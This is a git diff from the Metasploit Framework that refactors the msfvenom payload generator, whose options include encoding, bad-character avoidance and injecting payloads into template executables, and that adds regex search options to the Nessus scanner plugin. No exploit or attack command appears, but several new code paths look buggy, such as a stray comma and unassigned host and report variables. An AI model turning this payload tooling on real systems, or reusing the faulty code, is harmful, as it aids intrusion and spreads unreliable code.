+ raise UsageError, "No options\n#{opt}" + end + + if args + args.each do |x| + k,v = x.split('=', 2) + datastore[k.upcase] = v.to_s end - - opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| - if l.nil? or l.empty? - l = ["all"] - end - opts[:list] = l + if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? + datastore['LHOST'] = Rex::Socket.source_address end + end - opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| - opts[:nops] = n.to_i - end - - opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| - opts[:format] = f - end - - opt.on('--help-formats', String, "List available formats") do - init_framework(:module_types => []) - msg = "Executable formats\n" + - "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + - "Transform formats\n" + - "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") - raise UsageError, msg - end - - opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| - opts[:encoder] = e - end - - opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| - opts[:arch] = a - end - - opt.on('--platform <platform>', String, 'The platform of the payload') do |l| - opts[:platform] = l - end - - opt.on('--help-platforms', String, 'List available platforms') do - init_framework(:module_types => []) - supported_platforms = [] - Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} - msg = "Platforms\n" + - "\t" + supported_platforms * ", " - raise UsageError, msg - end - - opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| - opts[:space] = s - end - - opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| - opts[:encoder_space] = s - end - - opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| - opts[:badchars] = Rex::Text.hex_to_raw(b) - end - - opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| - opts[:iterations] = i - end - - opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| - opts[:add_code] = x - end - - opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| - opts[:template] = x - end - - opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do - opts[:keep] = true - end - - opt.on('-o', '--out <path>', 'Save the payload') do |x| - opts[:out] = x - end - - opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| - opts[:var_name] = x - end - - opt.on('--smallest', 'Generate the smallest possible payload') do - opts[:smallest] = true - end - - opt.on_tail('-h', '--help', 'Show this message') do - raise UsageError, "#{opt}" - end + if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin + opts[:payload] = "stdin" + end + if opts[:payload] == 'stdin' and not opts[:list] + $stderr.puts "Attempting to read payload from STDIN..." begin - opt.parse!(args) - rescue OptionParser::InvalidOption => e - raise UsageError, "Invalid option\n#{opt}" - rescue OptionParser::MissingArgument => e - raise UsageError, "Missing required argument for option\n#{opt}" - end - - if opts.empty? - raise UsageError, "No options\n#{opt}" - end - - if args - args.each do |x| - k,v = x.split('=', 2) - datastore[k.upcase] = v.to_s - end - if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? - datastore['LHOST'] = Rex::Socket.source_address + ::Timeout.timeout(30) do + opts[:stdin] = payload_stdin end + rescue Timeout::Error + opts[:stdin] = '' end - - if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin - opts[:payload] = "stdin" - end - - if opts[:payload] == 'stdin' and not opts[:list] - $stderr.puts "Attempting to read payload from STDIN..." - begin - ::Timeout.timeout(30) do - opts[:stdin] = payload_stdin - end - rescue Timeout::Error - opts[:stdin] = '' - end - end - - opts[:datastore] = datastore - - opts end + opts[:datastore] = datastore - # Read a raw payload from stdin (or whatever IO object we're currently - # using as stdin, see {#initialize}) - # - # @return [String] - def payload_stdin - @in = $stdin - @in.binmode - payload = @in.read - payload - end + opts +end - def dump_payloads - init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", - 'Columns' => - [ - "Name", - "Description" - ]) - framework.payloads.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } +# Read a raw payload from stdin (or whatever IO object we're currently +# using as stdin, see {#initialize}) +# +# @return [String] +def payload_stdin + @in = $stdin + @in.binmode + payload = @in.read + payload +end - "\n" + tbl.to_s + "\n" - end +def dump_payloads + init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - def dump_encoders(arch = nil) - init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), - 'Columns' => - [ - "Name", - "Rank", - "Description" - ]) - cnt = 0 + framework.payloads.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - framework.encoders.each_module( - 'Arch' => arch ? arch.split(',') : nil) { |name, mod| + "\n" + tbl.to_s + "\n" +end + +def dump_encoders(arch = nil) + init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), + 'Columns' => + [ + "Name", + "Rank", + "Description" + ]) + cnt = 0 + + framework.encoders.each_module( + 'Arch' => arch ? arch.split(',') : nil) { |name, mod| tbl << [ name, mod.rank_to_s, mod.new.name ] cnt += 1 } (cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n" - end +end - def dump_nops - init_framework(:module_types => [ ::Msf::MODULE_NOP ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", - 'Columns' => - [ - "Name", - "Description" - ]) +def dump_nops + init_framework(:module_types => [ ::Msf::MODULE_NOP ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - framework.nops.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } + framework.nops.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - "\n" + tbl.to_s + "\n" - end + "\n" + tbl.to_s + "\n" +end -if __FILE__ == $0 +begin + generator_opts = parse_args(ARGV) +rescue MsfVenomError, Msf::OptionValidateError => e + $stderr.puts "Error: #{e.message}" + exit(1) +end - begin - generator_opts = parse_args(ARGV) - rescue MsfVenomError, Msf::OptionValidateError => e - $stderr.puts "Error: #{e.message}" - exit(1) - end - - if generator_opts[:list] - generator_opts[:list].each do |mod| - case mod.downcase - when "payloads" - $stdout.puts dump_payloads - when "encoders" - $stdout.puts dump_encoders(generator_opts[:arch]) - when "nops" - $stdout.puts dump_nops - when "all" - # Init here so #dump_payloads doesn't create a framework with - # only payloads, etc. - init_framework - $stdout.puts dump_payloads - $stdout.puts dump_encoders - $stdout.puts dump_nops - else - if mod == 'payload' - question = ". Do you mean 'payloads'?" - elsif mod == 'encoder' - question = ". Do you mean 'encoders'?" - elsif mod == 'nop' - quesetion = ". Do you mean 'nops'?" - end - $stderr.puts "Invalid module type#{question}" - end +if generator_opts[:list] + generator_opts[:list].each do |mod| + case mod.downcase + when "payloads", "payload", "p" + $stdout.puts dump_payloads + when "encoders", "encoder", "e" + $stdout.puts dump_encoders(generator_opts[:arch]) + when "nops", "nop", "n" + $stdout.puts dump_nops + when "all" + # Init here so #dump_payloads doesn't create a framework with + # only payloads, etc. + init_framework + $stdout.puts dump_payloads + $stdout.puts dump_encoders + $stdout.puts dump_nops + else + $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" end - exit(0) + end + exit(0) +end + +if generator_opts[:list_options] + payload_mod = framework.payloads.create(generator_opts[:payload]) + + if payload_mod.nil? + $stderr.puts "Invalid payload: #{generator_opts[:payload]}" + exit end - if generator_opts[:list_options] - payload_mod = framework.payloads.create(generator_opts[:payload]) + $stderr.puts "Options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') - if payload_mod.nil? - $stderr.puts "Invalid payload: #{generator_opts[:payload]}" - exit - end + $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') - $stderr.puts "Options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') + $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') + exit(0) +end - $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') +generator_opts[:framework] = framework +generator_opts[:cli] = true - $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') - exit(0) - end +begin + venom_generator = Msf::PayloadGenerator.new(generator_opts) + payload = venom_generator.generate_payload +rescue ::Exception => e + elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") + $stderr.puts "Error: #{e.message}" +end - generator_opts[:framework] = framework - generator_opts[:cli] = true +# No payload generated, no point to go on +exit(2) unless payload +if generator_opts[:out] begin - venom_generator = Msf::PayloadGenerator.new(generator_opts) - payload = venom_generator.generate_payload + ::File.open(generator_opts[:out], 'wb') do |f| + f.write(payload) + end + $stderr.puts "Saved as: #{generator_opts[:out]}" rescue ::Exception => e + # If I can't save it, then I can't save it. I don't think it matters what error. elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") $stderr.puts "Error: #{e.message}" end - - # No payload generated, no point to go on - exit(2) unless payload - - if generator_opts[:out] - begin - ::File.open(generator_opts[:out], 'wb') do |f| - f.write(payload) - end - $stderr.puts "Saved as: #{generator_opts[:out]}" - rescue ::Exception => e - # If I can't save it, then I can't save it. I don't think it matters what error. - elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") - $stderr.puts "Error: #{e.message}" - end - else - output_stream = $stdout - output_stream.binmode - output_stream.write payload - # trailing newline for pretty output - $stderr.puts unless payload =~ /\n$/ - end - +else + output_stream = $stdout + output_stream.binmode + output_stream.write payload + # trailing newline for pretty output + $stderr.puts unless payload =~ /\n$/ end diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 99195b7cf0..7e31a2738c 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -36,10 +36,6 @@ module Msf "#{Msf::Config.local_directory}" end - def cmd_nessus_index - nessus_index - end - def commands { "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port <verify_ssl>", @@ -84,6 +80,155 @@ module Msf } end + def ncusage + print_status("%redYou must do this before any other commands.%clr") + print_status("Usage: ") + print_status("nessus_connect username:password@hostname:port <ssl_verify>") + print_status("Example:> nessus_connect msf:msf@192.168.1.10:8834") + print_status("OR") + print_status("nessus_connect username@hostname:port ssl_verify") + print_status("Example:> nessus_connect msf@192.168.1.10:8834 ssl_verify") + print_status("OR") + print_status("nessus_connect hostname:port ssl_verify") + print_status("Example:> nessus_connect 192.168.1.10:8834 ssl_verify") + print_status("OR") + print_status("nessus_connect") + print_status("Example:> nessus_connect") + print_status("This only works after you have saved creds with nessus_save") + return + end + + #creates the index of exploit details to make searching for exploits much faster. + def create_xindex + start = Time.now + print_status("Creating Exploit Search Index - (#{xindex}) - this won't take long.") + count = 0 + #Use Msf::Config.get_config_root as the location. + File.open("#{xindex}", "w+") do |f| + #need to add version line. + f.puts(Msf::Framework::Version) + framework.exploits.sort.each { |refname, mod| + stuff = "" + o = nil + begin + o = mod.new + rescue ::Exception + end + stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" + next if not o + o.references.map do |x| + if !(x.ctx_id == "URL") + if (x.ctx_id == "MSB") + stuff << "|#{x.ctx_val}" + else + stuff << "|#{x.ctx_id}-#{x.ctx_val}" + end + end + end + stuff << "\n" + f.puts(stuff) + } + end + total = Time.now - start + print_status("It has taken : #{total} seconds to build the exploits search index") + end + + def nessus_index + if File.exist?("#{xindex}") + #check if it's version line matches current version. + File.open("#{xindex}") { |f| + line = f.readline + line.chomp! + if line.to_i == Msf::Framework::RepoRevision + print_good("Exploit Index - (#{xindex}) - is valid.") + else + create_xindex + end + } + else + create_xindex + end + end + + def nessus_login + if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) + print_status("You need to connect to a server first.") + ncusage + return + end + @url = "https://#{@host}:#{@port}/" + print_status("Connecting to #{@url} as #{@user}") + @n = Nessus::Client.new(@url, @user, @pass,@sslv) + if @n.authenticated + print_status("User #{@user} authenticated successfully.") + @token = 1 + else + print_error("Error connecting/logging to the server!") + return + end + end + + def nessus_verify_token + if @token.nil? or @token == '' + ncusage + return false + end + true + end + + def valid_policy(*args) + case args.length + when 1 + pid = args[0] + else + print_error("No Policy ID supplied.") + return + end + pol = @n.list_policies + pol["policies"].each { |p| + if p["template_uuid"] == pid + return true + end + } + return false + end + + def nessus_verify_db + if !(framework.db and framework.db.active) + print_error("No database has been configured, please use db_create/db_connect first") + return false + end + true + end + + def check_scan(*args) + case args.length + when 1 + scan_id = args[0] + else + print_error("No scan ID supplied") + return + end + scans = @n.scan_list + scans.each { |scan| + if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" + return true + end + } + return false + end + + def is_scan_complete(scan_id) + complete = false + status = @n.scan_list + status["scans"].each { |scan| + if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") + complete = true + end + } + complete + end + def cmd_nessus_help(*args) tbl = Rex::Ui::Text::Table.new( 'Columns' => [ @@ -153,82 +298,8 @@ module Msf print_line "" end - def ncusage - print_status("%redYou must do this before any other commands.%clr") - print_status("Usage: ") - print_status("nessus_connect username:password@hostname:port <ssl_verify>") - print_status("Example:> nessus_connect msf:msf@192.168.1.10:8834") - print_status("OR") - print_status("nessus_connect username@hostname:port ssl_verify") - print_status("Example:> nessus_connect msf@192.168.1.10:8834 ssl_verify") - print_status("OR") - print_status("nessus_connect hostname:port ssl_verify") - print_status("Example:> nessus_connect 192.168.1.10:8834 ssl_verify") - print_status("OR") - print_status("nessus_connect") - print_status("Example:> nessus_connect") - print_status("This only works after you have saved creds with nessus_save") - return - end - - #creates the index of exploit details to make searching for exploits much faster. - def create_xindex - start = Time.now - print_status("Creating Exploit Search Index - (#{xindex}) - this won't take long.") - count = 0 - #Use Msf::Config.get_config_root as the location. - File.open("#{xindex}", "w+") do |f| - #need to add version line. - f.puts(Msf::Framework::RepoRevision) - framework.exploits.sort.each { |refname, mod| - stuff = "" - o = nil - begin - o = mod.new - rescue ::Exception - end - stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" - next if not o - o.references.map do |x| - if !(x.ctx_id == "URL") - if (x.ctx_id == "MSB") - stuff << "|#{x.ctx_val}" - else - stuff << "|#{x.ctx_id}-#{x.ctx_val}" - end - end - end - stuff << "\n" - f.puts(stuff) - } - end - total = Time.now - start - print_status("It has taken : #{total} seconds to build the exploits search index") - end - - def nessus_index - if File.exist?("#{xindex}") - #check if it's version line matches current version. - File.open("#{xindex}") { |f| - line = f.readline - line.chomp! - if line.to_i == Msf::Framework::RepoRevision - print_good("Exploit Index - (#{xindex}) - is valid.") - else - create_xindex - end - } - else - create_xindex - end - end - - def nessus_verify_token - if @token.nil? or @token == '' - ncusage - return false - end - true + def cmd_nessus_index + nessus_index end def cmd_nessus_connect(*args) @@ -326,24 +397,6 @@ module Msf return end - def nessus_login - if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) - print_status("You need to connect to a server first.") - ncusage - return - end - @url = "https://#{@host}:#{@port}/" - print_status("Connecting to #{@url} as #{@user}") - @n = Nessus::Client.new(@url, @user, @pass,@sslv) - if @n.authenticated - print_status("User #{@user} authenticated successfully.") - @token = 1 - else - print_error("Error connecting/logging to the server!") - return - end - end - def cmd_nessus_save(*args) #if we are logged in, save session details to nessus.yaml if args[0] == "-h" @@ -370,15 +423,22 @@ module Msf end def cmd_nessus_server_properties(*args) - if args[0] == "-h" - print_status("nessus_server_feed") - print_status("Example:> nessus_server_feed") - print_status() - print_status("Returns information about the feed type and server version.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_properties") + print_status("Example:> nessus_server_properties -S searchterm") + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + resp = @n.server_properties tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Feed', 'Type', @@ -392,14 +452,21 @@ module Msf end def cmd_nessus_server_status(*args) - if args[0] == "-h" - print_status("nessus_server_status") - print_status("Example:> nessus_server_status") - print_status() - print_status("Returns some status items for the server..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_status") + print_status("Example:> nessus_server_status -S searchterm") + print_status("Returns some status items for the server..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Status', 'Progress' @@ -410,14 +477,17 @@ module Msf end def cmd_nessus_admin(*args) - if args[0] == "-h" - print_status("nessus_admin") - print_status("Example:> nessus_admin") - print_status() - print_status("Checks to see if the current user is an admin") - print_status("Use nessus_user_list to list all users") - return + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_admin") + print_status("Example:> nessus_admin") + print_status("Checks to see if the current user is an admin") + print_status("Use nessus_user_list to list all users") + return + end end + if !nessus_verify_token return end @@ -429,15 +499,21 @@ module Msf end def cmd_nessus_template_list(*args) - if args[0] == "-h" - print_status("nessus_template_list <scan> | <policy>") - print_status("Example:> nessus_template_list scan") - print_status("OR") - print_status("nessus_template_list policy") - print_status() - print_status("Returns a list of information about the scan or policy templates..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_template_list <scan> | <policy>") + print_status("Example:> nessus_template_list scan -S searchterm") + print_status("OR") + print_status("nessus_template_list policy") + print_status("Returns a list of information about the scan or policy templates..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -450,7 +526,6 @@ module Msf print_status("Example:> nessus_template_list scan") print_status("OR") print_status("nessus_template_list policy") - print_status() print_status("Returns a list of information about the scan or policy templates..") return end @@ -465,11 +540,12 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Name', 'Title', 'Description', - 'Subscription Only', + 'Subscription Only', 'Cloud Only' ]) list["templates"].each { |template| @@ -479,12 +555,20 @@ module Msf print_line tbl.to_s end - def cmd_nessus_folder_list + def cmd_nessus_folder_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end list = @n.list_folders tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", @@ -497,7 +581,19 @@ module Msf print_line tbl.to_s end - def cmd_nessus_scanner_list + def cmd_nessus_scanner_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scanner_list") + print_status("Example:> nessus_scanner_list -S searchterm") + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end @@ -506,6 +602,7 @@ module Msf end list = @n.list_scanners tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", @@ -520,40 +617,31 @@ module Msf print_line tbl.to_s end - def check_scan(*args) - case args.length - when 1 - scan_id = args[0] - else - print_error("No scan ID supplied") - return - end - scans = @n.scan_list - scans.each { |scan| - if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" - return true - end - } - return false - end - def cmd_nessus_report_hosts(*args) - if args[0] == "-h" - print_status("nessus_report_hosts <scan ID>") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_hosts <scan ID> -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id - else + + if scan_id.nil? print_status("Usage: ") - print_status("nessus_report_hosts <scan ID>") + print_status("nessus_report_hosts <scan ID> -S searchterm") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", @@ -576,22 +664,28 @@ module Msf end def cmd_nessus_report_vulns(*args) - if args[0] == "-h" - print_status("nessus_report_vulns <scan ID>") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_vulns <scan ID> -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id.to_i - else + if scan_id.nil? print_status("Usage: ") print_status("nessus_report_vulns <scan ID>") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", @@ -613,21 +707,29 @@ module Msf end def cmd_nessus_report_host_details(*args) - if args[0] == "-h" - print_status("nessus_report_host_details <scan ID> <host ID>") - print_status("Example:> nessus_report_host_details 10 5") - print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") - print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") - return + search_term = nil + search_vuln = nil + scan_id = nil + host_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_details <scan ID> <host ID>") + print_status("Example:> nessus_report_host_details 10 5 -S hostinfo -SV vulninfo") + print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") + print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + when '-SV', '--search-vuln' + search_vuln = /#{args.shift}/nmi + else + scan_id = arg, + host_id = args.shift + end end - if !nessus_verify_token - return - end - case args.length - when 2 - scan_id = args[0] - host_id = args[1] - else + + if [scan_id, host_id].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_detail <scan ID> <host ID>") print_status("Example:> nessus_report_host_detail 10 5") @@ -636,6 +738,7 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin Name', 'Plugin Famil', @@ -654,6 +757,7 @@ module Msf } print_line tbl.to_s tbl2 = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_vuln, 'Columns' => [ 'Plugin Name', 'Plugin Famil', @@ -698,27 +802,32 @@ module Msf end def cmd_nessus_report_host_ports(*args) - if args[0] == "-h" - print_status("nessus_report_host_ports <hostname> <report id>") - print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() - print_status("Returns all the ports associated with a host and details about their vulnerabilities") - print_status("Use nessus_report_hosts to list all available hosts for a report") + search_term = nil + rid = nil + host = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_ports <hostname> <report id>") + print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca -S searchterm") + print_status("Returns all the ports associated with a host and details about their vulnerabilities") + print_status("Use nessus_report_hosts to list all available hosts for a report") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - if !nessus_verify_token - return - end - case args.length - when 2 - host = args[0] - rid = args[1] - else + + if [host,rid].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_ports <hostname> <report id>") print_status("Use nessus_report_list to list all available reports") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Port', 'Protocol', @@ -744,7 +853,6 @@ module Msf if args[0] == "-h" print_status("nessus_report_del <reportname>") print_status("Example:> nessus_report_del f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Must be an admin to del reports.") print_status("Use nessus_report_list to list all reports") return @@ -775,13 +883,19 @@ module Msf end def cmd_nessus_scan_list(*args) - if args[0] == "-h" - print_status("nessus_scan_list") - print_status("Example:> nessus_scan_list") - print_status() - print_status("Returns a list of information about currently running scans.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scan_list") + print_status("Example:> nessus_scan_list -S searchterm") + print_status("Returns a list of information about currently running scans.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -791,6 +905,7 @@ module Msf return else tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Scan ID', 'Name', @@ -891,7 +1006,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause <scan id>") print_status("Example:> nessus_scan_pause f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Pauses a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -919,7 +1033,6 @@ module Msf def cmd_nessus_db_scan(*args) if args[0] == "-h" print_status("nessus_db_scan <policy ID> <scan name> <scan description>") - print_status() print_status("Creates a scan based on all the hosts listed in db_hosts.") print_status("Use nessus_policy_list to list all available policies with their corresponding policy IDs") return @@ -966,7 +1079,6 @@ module Msf if args[0] == "-h" print_status("nessus_db_import <scan ID>") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if !nessus_verify_db @@ -982,7 +1094,6 @@ module Msf print_status("Usage: ") print_status("nessus_db_import <scan ID>") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if is_scan_complete(scan_id) @@ -1014,18 +1125,6 @@ module Msf else print_error("Only completed scans could be used for import") end - - end - - def is_scan_complete(scan_id) - complete = false - status = @n.scan_list - status["scans"].each { |scan| - if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") - complete = true - end - } - complete end def cmd_nessus_scan_pause_all(*args) @@ -1033,7 +1132,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause_all") print_status("Example:> nessus_scan_pause_all") - print_status() print_status("Pauses all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1061,7 +1159,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop <scan id>") print_status("Example:> nessus_scan_stop f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Stops a currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1091,7 +1188,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop_all") print_status("Example:> nessus_scan_stop_all") - print_status() print_status("stops all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1119,7 +1215,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume <scan id>") print_status("Example:> nessus_scan_resume f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("resumes a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -1149,7 +1244,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume_all") print_status("Example:> nessus_scan_resume_all") - print_status() print_status("resumes all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1174,35 +1268,39 @@ module Msf end def cmd_nessus_scan_details(*args) - if args[0] == "-h" - print_status("nessus_scan_details <scan ID> <category>") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return + valid_categories = ['info', 'hosts', 'vulnerabilities', 'history'] + search_term = nil + scan_id = nil + category = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("Usage: ") + print_status("nessus_scan_details <scan ID> <category> -S searchterm") + print_status("Availble categories are info, hosts, vulnerabilities, and history") + print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + if args[0].in?(valid_categories) + category = args.shift + else + print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") + return + end + end end + if !nessus_verify_token return end - case args.length - when 2 - scan_id = args[0] - category = args[1] - if category.in?(['info', 'hosts', 'vulnerabilities', 'history']) - category = args[1] - else - print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") - return - end - else - print_status("Usage: ") - print_status("nessus_scan_details <scan ID> <category>") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return - end + details = 